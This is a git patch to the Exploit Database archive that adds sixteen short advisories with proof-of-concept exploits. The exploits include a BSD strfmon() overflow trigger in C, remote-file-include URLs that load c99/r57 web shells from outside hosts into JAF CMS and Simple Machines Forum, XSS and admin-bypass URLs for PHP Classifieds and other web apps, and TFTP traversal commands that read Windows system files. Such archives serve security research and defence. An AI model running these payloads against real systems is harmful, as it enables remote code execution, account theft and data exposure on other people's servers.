From 175259327464812f338a51dc35ac368164992952 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 12 Feb 2014 04:27:35 +0000 Subject: [PATCH] Updated 02_12_2014 --- files.csv | 16 ++++++++ platforms/bsd/dos/31550.c | 19 +++++++++ platforms/multiple/remote/31551.txt | 11 ++++++ platforms/php/webapps/31549.txt | 14 +++++++ platforms/php/webapps/31555.txt | 12 ++++++ platforms/php/webapps/31556.txt | 9 +++++ platforms/php/webapps/31557.txt | 9 +++++ platforms/php/webapps/31558.txt | 9 +++++ platforms/php/webapps/31559.txt | 9 +++++ platforms/php/webapps/31560.txt | 9 +++++ platforms/php/webapps/31561.txt | 9 +++++ platforms/php/webapps/31564.txt | 9 +++++ platforms/php/webapps/31565.txt | 11 ++++++ platforms/php/webapps/31566.txt | 11 ++++++ platforms/php/webapps/31567.txt | 9 +++++ platforms/php/webapps/31568.txt | 60 +++++++++++++++++++++++++++++ platforms/windows/remote/31562.txt | 10 +++++ 17 files changed, 236 insertions(+) create mode 100755 platforms/bsd/dos/31550.c create mode 100755 platforms/multiple/remote/31551.txt create mode 100755 platforms/php/webapps/31549.txt create mode 100755 platforms/php/webapps/31555.txt create mode 100755 platforms/php/webapps/31556.txt create mode 100755 platforms/php/webapps/31557.txt create mode 100755 platforms/php/webapps/31558.txt create mode 100755 platforms/php/webapps/31559.txt create mode 100755 platforms/php/webapps/31560.txt create mode 100755 platforms/php/webapps/31561.txt create mode 100755 platforms/php/webapps/31564.txt create mode 100755 platforms/php/webapps/31565.txt create mode 100755 platforms/php/webapps/31566.txt create mode 100755 platforms/php/webapps/31567.txt create mode 100755 platforms/php/webapps/31568.txt create mode 100755 platforms/windows/remote/31562.txt diff --git a/files.csv b/files.csv index 6e589915c..beaba3c09 100755 --- a/files.csv +++ b/files.csv @@ -28344,3 +28344,19 @@ id,file,description,date,author,platform,type,port 31545,platforms/php/webapps/31545.txt,"GeeCarts view.php id Parameter XSS",2008-03-26,"Ivan Sanchez",php,webapps,0 31546,platforms/asp/webapps/31546.txt,"DigiDomain 2.2 lookup_result.asp domain Parameter XSS",2008-03-27,Linux_Drox,asp,webapps,0 31547,platforms/asp/webapps/31547.txt,"DigiDomain 2.2 suggest_result.asp Multiple Parameter XSS",2008-03-27,Linux_Drox,asp,webapps,0 +31549,platforms/php/webapps/31549.txt,"JAF CMS 4.0.0 RC2 'website' and 'main_dir' Parameters Multiple Remote File Include Vulnerabilities",2008-03-27,XxX,php,webapps,0 +31550,platforms/bsd/dos/31550.c,"Multiple BSD Platforms 'strfmon()' Function Integer Overflow Weakness",2008-03-27,"Maksymilian Arciemowicz",bsd,dos,0 +31551,platforms/multiple/remote/31551.txt,"Apache Tomcat 4.0.3 Requests Containing MS-DOS Device Names Information Disclosure Vulnerability",2005-10-14,"security curmudgeon",multiple,remote,0 +31555,platforms/php/webapps/31555.txt,"Simple Machines Forum <= 1.1.4 Multiple Remote File Include Vulnerabilities",2008-03-28,Sibertrwolf,php,webapps,0 +31556,platforms/php/webapps/31556.txt,"Cuteflow Bin 1.5 pages/showtemplates.php language Parameter XSS",2008-03-29,hadihadi,php,webapps,0 +31557,platforms/php/webapps/31557.txt,"Cuteflow Bin 1.5 pages/editmailinglist_step1.php language Parameter XSS",2008-03-29,hadihadi,php,webapps,0 +31558,platforms/php/webapps/31558.txt,"Cuteflow Bin 1.5 pages/showcirculation.php language Parameter XSS",2008-03-29,hadihadi,php,webapps,0 +31559,platforms/php/webapps/31559.txt,"Cuteflow Bin 1.5 pages/edittemplate_step2.php language Parameter XSS",2008-03-29,hadihadi,php,webapps,0 +31560,platforms/php/webapps/31560.txt,"Cuteflow Bin 1.5 pages/showfields.php language Parameter XSS",2008-03-29,hadihadi,php,webapps,0 +31561,platforms/php/webapps/31561.txt,"Cuteflow Bin 1.5 pages/showuser.php language Parameter XSS",2008-03-29,hadihadi,php,webapps,0 +31562,platforms/windows/remote/31562.txt,"2X ThinClientServer 5.0 sp1-r3497 TFTP service Directory Traversal Vulnerability",2008-03-29,"Luigi Auriemma",windows,remote,0 +31564,platforms/php/webapps/31564.txt,"Jack (tR) Jax LinkLists 1.00 'jax_linklists.php' Cross-Site Scripting Vulnerability",2008-03-31,ZoRLu,php,webapps,0 +31565,platforms/php/webapps/31565.txt,"@lex Guestbook <= 4.0.5 setup.php language_setup Parameter XSS",2008-03-31,ZoRLu,php,webapps,0 +31566,platforms/php/webapps/31566.txt,"@lex Guestbook <= 4.0.5 index.php test Parameter XSS",2008-03-31,ZoRLu,php,webapps,0 +31567,platforms/php/webapps/31567.txt,"@lex Poll 1.2 'setup.php' Cross-Site Scripting Vulnerability",2008-03-31,ZoRLu,php,webapps,0 +31568,platforms/php/webapps/31568.txt,"PHP Classifieds 6.20 Multiple Cross Site Scripting and Authentication Bypass Vulnerabilities",2008-03-31,ZoRLu,php,webapps,0 diff --git a/platforms/bsd/dos/31550.c b/platforms/bsd/dos/31550.c new file mode 100755 index 000000000..b065dc7f2 --- /dev/null +++ b/platforms/bsd/dos/31550.c @@ -0,0 +1,19 @@ +source: http://www.securityfocus.com/bid/28479/info + +Multiple BSD platforms are prone to an integer-overflow weakness. + +An attacker can exploit this issue through other applications such as PHP to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. + +This issue affects FreeBSD 6, 7 and NetBSD 4; other platforms may also be affected. + +#include +#include + +int main(int argc, char* argv[]){ +char buff[51]; +char *bux=buff; +int res; + +res=strfmon(bux, 50, argv[1], "0"); +return 0; +} diff --git a/platforms/multiple/remote/31551.txt b/platforms/multiple/remote/31551.txt new file mode 100755 index 000000000..31fc7b49e --- /dev/null +++ b/platforms/multiple/remote/31551.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/28484/info + +Apache Tomcat is prone to an information-disclosure vulnerability when handling requests that contain MS-DOS device names. + +Attackers can leverage this issue to obtain potentially sensitive data that could aid in other attacks. + +Tomcat 4.0.3 running on Windows is vulnerable; other versions may also be affected. + +The following example request is available: + +GET /lpt9.xtp \ No newline at end of file diff --git a/platforms/php/webapps/31549.txt b/platforms/php/webapps/31549.txt new file mode 100755 index 000000000..542113728 --- /dev/null +++ b/platforms/php/webapps/31549.txt @@ -0,0 +1,14 @@ +source: http://www.securityfocus.com/bid/28476/info + +JAF CMS is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. + +An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible. + +JAF CMS 4.0.0 RC2 is vulnerable; other versions may also be affected. + +http://www.example.com/forum.php?website=http://www.example2.com/c99.txt? +http://www.example.com/forum.php?main_dir=http://www.example2.com/c99.txt? +http://www.example.com/headlines.php?website=http://www.example2.com/erne.txt? +http://www.example.com/headlines.php?main_dir=http://www.example2.com/r57.txt? +http://www.example.com/main.php?website=http://www.example2.com/c99.txt? +http://www.example.com/main.php?main_dir=http://www.example2.com/erne.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31555.txt b/platforms/php/webapps/31555.txt new file mode 100755 index 000000000..debb0b43b --- /dev/null +++ b/platforms/php/webapps/31555.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/28493/info + +Simple Machines Forum is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. + +An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible. + +Simple Machines Forum 1.1.4 is vulnerable; other versions may also be affected. + +http://www.example.com/Sources/Subs-Graphics.php?settings[default_theme_dir]=http://bilmemne.siz/c99.txt +http://www.example.com/Sources/Themes.php?settings[theme_dir]=http://bilmemne.siz/c99.txt? + + diff --git a/platforms/php/webapps/31556.txt b/platforms/php/webapps/31556.txt new file mode 100755 index 000000000..4f10bef2f --- /dev/null +++ b/platforms/php/webapps/31556.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28500/info + +CuteFlow Bin is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include a SQL-injection vulnerability and multiple cross-site scripting vulnerabilities. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +These issues affect CuteFlow Bin 1.5.0; other versions may also be affected. + +http://www.example.com/[path]//pages/showtemplates.php?language= \ No newline at end of file diff --git a/platforms/php/webapps/31557.txt b/platforms/php/webapps/31557.txt new file mode 100755 index 000000000..6b18ac176 --- /dev/null +++ b/platforms/php/webapps/31557.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28500/info + +CuteFlow Bin is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include a SQL-injection vulnerability and multiple cross-site scripting vulnerabilities. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +These issues affect CuteFlow Bin 1.5.0; other versions may also be affected. + +http://www.example.com/[path]//pages/editmailinglist_step1.php?language= \ No newline at end of file diff --git a/platforms/php/webapps/31558.txt b/platforms/php/webapps/31558.txt new file mode 100755 index 000000000..bbcfef095 --- /dev/null +++ b/platforms/php/webapps/31558.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28500/info + +CuteFlow Bin is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include a SQL-injection vulnerability and multiple cross-site scripting vulnerabilities. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +These issues affect CuteFlow Bin 1.5.0; other versions may also be affected. + +http://www.example.com/[path]/page/showcirculation.php?language= \ No newline at end of file diff --git a/platforms/php/webapps/31559.txt b/platforms/php/webapps/31559.txt new file mode 100755 index 000000000..a26336fad --- /dev/null +++ b/platforms/php/webapps/31559.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28500/info + +CuteFlow Bin is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include a SQL-injection vulnerability and multiple cross-site scripting vulnerabilities. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +These issues affect CuteFlow Bin 1.5.0; other versions may also be affected. + +http://www.example.com/[path]/pages/edittemplate_step2.php?language= \ No newline at end of file diff --git a/platforms/php/webapps/31560.txt b/platforms/php/webapps/31560.txt new file mode 100755 index 000000000..90fcead46 --- /dev/null +++ b/platforms/php/webapps/31560.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28500/info + +CuteFlow Bin is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include a SQL-injection vulnerability and multiple cross-site scripting vulnerabilities. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +These issues affect CuteFlow Bin 1.5.0; other versions may also be affected. + +http://www.example.com/[path]//pages/showfields.php?language= \ No newline at end of file diff --git a/platforms/php/webapps/31561.txt b/platforms/php/webapps/31561.txt new file mode 100755 index 000000000..6cd69a959 --- /dev/null +++ b/platforms/php/webapps/31561.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28500/info + +CuteFlow Bin is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include a SQL-injection vulnerability and multiple cross-site scripting vulnerabilities. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +These issues affect CuteFlow Bin 1.5.0; other versions may also be affected. + +http://www.example.com/[path]//pages/showuser.php?language= \ No newline at end of file diff --git a/platforms/php/webapps/31564.txt b/platforms/php/webapps/31564.txt new file mode 100755 index 000000000..c58348bdc --- /dev/null +++ b/platforms/php/webapps/31564.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28518/info + +Jax LinkLists is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Jax LinkLists 1.00 is vulnerable; other versions may also be affected. + +http://www.example.com/scripting/php/linklists/linklists/jax_linklists.php?do=list&list_id=0&language=german&cat="> \ No newline at end of file diff --git a/platforms/php/webapps/31565.txt b/platforms/php/webapps/31565.txt new file mode 100755 index 000000000..4a3142be0 --- /dev/null +++ b/platforms/php/webapps/31565.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/28519/info + +@lex Guestbook is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +@lex Guestbook 4.0.5 is vulnerable; other versions may also be affected. + +UPDATE (April 25, 2008): The vendor indicates that the 'test' parameter is a user-defined parameter and is not vulnerable. + +http://www.example.com/alexguestbook4/setup.php?language_setup="> \ No newline at end of file diff --git a/platforms/php/webapps/31566.txt b/platforms/php/webapps/31566.txt new file mode 100755 index 000000000..cdc4d345c --- /dev/null +++ b/platforms/php/webapps/31566.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/28519/info + +@lex Guestbook is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +@lex Guestbook 4.0.5 is vulnerable; other versions may also be affected. + +UPDATE (April 25, 2008): The vendor indicates that the 'test' parameter is a user-defined parameter and is not vulnerable. + +http://www.example.com/alexguestbook4/index.php?mots_search=&rechercher=Ok&debut=0(=&skin=&test="> \ No newline at end of file diff --git a/platforms/php/webapps/31567.txt b/platforms/php/webapps/31567.txt new file mode 100755 index 000000000..896bf2bea --- /dev/null +++ b/platforms/php/webapps/31567.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28520/info + +@lex Poll is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +@lex Poll 2.1 is vulnerable; other versions may also be affected. + +http://www.example.com/alex_poll2/setup.php?language_setup="> \ No newline at end of file diff --git a/platforms/php/webapps/31568.txt b/platforms/php/webapps/31568.txt new file mode 100755 index 000000000..0280fbf04 --- /dev/null +++ b/platforms/php/webapps/31568.txt @@ -0,0 +1,60 @@ +source: http://www.securityfocus.com/bid/28521/info + +PHP Classifieds is prone to multiple cross-site scripting vulnerabilities and an authentication-bypass vulnerability. + +An attacker may leverage these issues to gain unauthorized access to the affected application and execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +PHP Classifieds 6.20 is vulnerable; other versions may also be affected. + +admin bypass + +http://localhost/classifieds/admin ( admin menu ) + +http://localhost/classifieds/admin/set.php?file_name=config/general.inc.php ( general setup ) + +http://localhost/classifieds/admin/set.php?file_name=config/options.inc.php ( options ) + +http://localhost/classifieds/admin/set.php?file_name=config/globaluser.inc.php ( Global user fields ) + +http://localhost/classifieds/admin/set.php?file_name=config/credits.inc.php ( credits ) + +http://localhost/classifieds/admin/set.php?file_name=config/pay.inc.php ( payments ) + +classified XSS + +http://localhost/classifieds/admin/visitor_stat.php?order_by=page&dir=asc&mo=&yr="> + +http://localhost/classifieds/search.php?do_search=Search&searchword="> + +http://localhost/classifieds/install.php?level=3&q_tbl=">&fav_tbl=favourites&stat_tbl=stat&template_tbl=templ +ate&adv_tbl=advertisers&banner_tbl=banners&payment_tbl=payment&usr_tbl=user&ads_tbl=ad&cat_tbl=category&pic_tbl=picture + +http://localhost/classifieds/install.php?level=3&q_tbl=questions&fav_tbl=">&stat_tbl=stat&template_tbl=templa +te&adv_tbl=advertisers&banner_tbl=banners&payment_tbl=payment&usr_tbl=user&ads_tbl=ad&cat_tbl=category&pic_tbl=picture + +http://localhost/classifieds/install.php?level=3&q_tbl=questions&fav_tbl=favourites&stat_tbl=">&template_tbl= +template&adv_tbl=advertisers&banner_tbl=banners&payment_tbl=payment&usr_tbl=user&ads_tbl=ad&cat_tbl=category&pic_tbl=picture + +http://localhost/classifieds/install.php?level=3&q_tbl=questions&fav_tbl=favourites&stat_tbl=stat&template_tbl=">&banner_tbl=banners&payment_tbl=payment&usr_tbl=user&ads_tbl=ad&cat_tbl=category&pic_tbl=picture + +http://localhost/classifieds/install.php?level=3&q_tbl=questions&fav_tbl=favourites&stat_tbl=stat&template_tbl=template&adv_tbl=advertisers&banner_tbl="> +&payment_tbl=payment&usr_tbl=user&ads_tbl=ad&cat_tbl=category&pic_tbl=picture + +http://localhost/classifieds/install.php?level=3&q_tbl=questions&fav_tbl=favourites&stat_tbl=stat&template_tbl=template&adv_tbl=advertisers&banner_tbl=ba +nners&payment_tbl=">&usr_tbl=user&ads_tbl=ad&cat_tbl=category&pic_tbl=picture + +http://localhost/classifieds/install.php?level=3&q_tbl=questions&fav_tbl=favourites&stat_tbl=stat&template_tbl=template&adv_tbl=advertisers&banner_tbl=ba +nners&payment_tbl=payment&usr_tbl=">&ads_tbl=ad&cat_tbl=category&pic_tbl=picture + +http://localhost/classifieds/install.php?level=3&q_tbl=questions&fav_tbl=favourites&stat_tbl=stat&template_tbl=template&adv_tbl=advertisers&banner_tbl=ba +nners&payment_tbl=payment&usr_tbl=user&ads_tbl=">&cat_tbl=category&pic_tbl=picture + +http://localhost/classifieds/install.php?level=3&q_tbl=questions&fav_tbl=favourites&stat_tbl=stat&template_tbl=template&adv_tbl=advertisers&banner_tbl=ba +nners&payment_tbl=payment&usr_tbl=user&ads_tbl=ad&cat_tbl=">&pic_tbl=picture + +http://localhost/classifieds/install.php?level=3&q_tbl=questions&fav_tbl=favourites&stat_tbl=stat&template_tbl=template&adv_tbl=advertisers&banner_tbl=ba +nners&payment_tbl=payment&usr_tbl=user&ads_tbl=ad&cat_tbl=category&pic_tbl="> diff --git a/platforms/windows/remote/31562.txt b/platforms/windows/remote/31562.txt new file mode 100755 index 000000000..0ff0c1ae4 --- /dev/null +++ b/platforms/windows/remote/31562.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/28504/info + +2X ThinClientServer is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. + +Exploiting this issue allows an attacker to access arbitrary files outside of the TFTP application's root directory. This can expose sensitive information that could help the attacker launch further attacks. + +2X ThinClientServer 5.0 sp1-r3497 with TFTPd.exe 3.2.0.0 is vulnerable; other versions may also be affected. + +tftpx SERVER .../.../.../.../.../.../boot.ini none +tftpx SERVER ...\...\...\...\...\...\windows\win.ini none \ No newline at end of file